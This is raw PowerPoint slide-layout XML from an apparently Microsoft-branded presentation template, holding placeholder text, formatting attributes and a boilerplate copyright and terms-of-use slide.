                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/1/2020</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Segoe Pro Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8850629" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>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FFF257A-30C5-4AFB-911B-BE4CEEA1EA8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1204939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dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="101605" y="6019801"/>
            <a:ext cx="11754657" cy="535531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91436" tIns="45718" rIns="91436" bIns="45718"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>© 2014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800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24733386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dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Picture Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10363200" y="3219"/>
            <a:ext cx="1828800" cy="504535"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>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101605" y="6019801"/>
            <a:ext cx="11754657" cy="535531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91436" tIns="45718" rIns="91436" bIns="45718"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>© 2014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800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13096077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dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>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36" tIns="91436">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01605" y="6019801"/>
            <a:ext cx="11754657" cy="535531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91436" tIns="45718" rIns="91436" bIns="45718"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>© 2014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800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35526397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500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>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01605" y="6019801"/>
            <a:ext cx="11754657" cy="535531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91436" tIns="45718" rIns="91436" bIns="45718"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>© 2014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800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1908769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a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>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BDAD117-59EF-470E-AC62-1A48EE8D7A8A}"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5/1/2020</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8850629" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{AFFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr lang="en-US" kern="0" smtClean="0"/>
              <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402336" y="1143000"/>
            <a:ext cx="11173968" cy="4956048"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="90000"/>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="1600"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4673600" y="635508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6211884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5"/>
            <a:ext cx="7620000" cy="4246563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91436" tIns="45718">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="630207" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="19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100">
                <a:latin typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3100">
                <a:latin typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3100">
                <a:latin typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3100">
                <a:latin typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1152527"/>
            <a:ext cx="3048000" cy="4237039"/>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a:t>Enter header here.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15544320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21" y="2895605"/>
            <a:ext cx="3566383" cy="842963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14563608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pyright">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="tx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0" y="361949"/>
            <a:ext cx="11811000" cy="5962651"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91436" tIns="45718" rIns="91436" bIns="45718"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3" marR="0" lvl="0" indent="6350" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2300" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Conditions and Terms of Use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="112713" marR="0" lvl="0" indent="6350" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Microsoft Confidential</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="112713" marR="0" lvl="0" indent="6350" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>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marL="112713" marR="0" lvl="0" indent="6350" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>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marL="112713" marR="0" lvl="0" indent="6350" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>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pPr marL="112713" marR="0" lvl="0" indent="6350" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="112713" marR="0" lvl="0" indent="6350" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2300" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Copyright and Trademarks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="112713" marR="0" lvl="0" indent="6350" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>© 2014 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="112713" marR="0" lvl="0" indent="6350" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>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marL="112713" marR="0" lvl="0" indent="6350" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>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marL="112713" marR="0" lvl="0" indent="6350" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>For more information, see </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Use of Microsoft Copyrighted Content </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
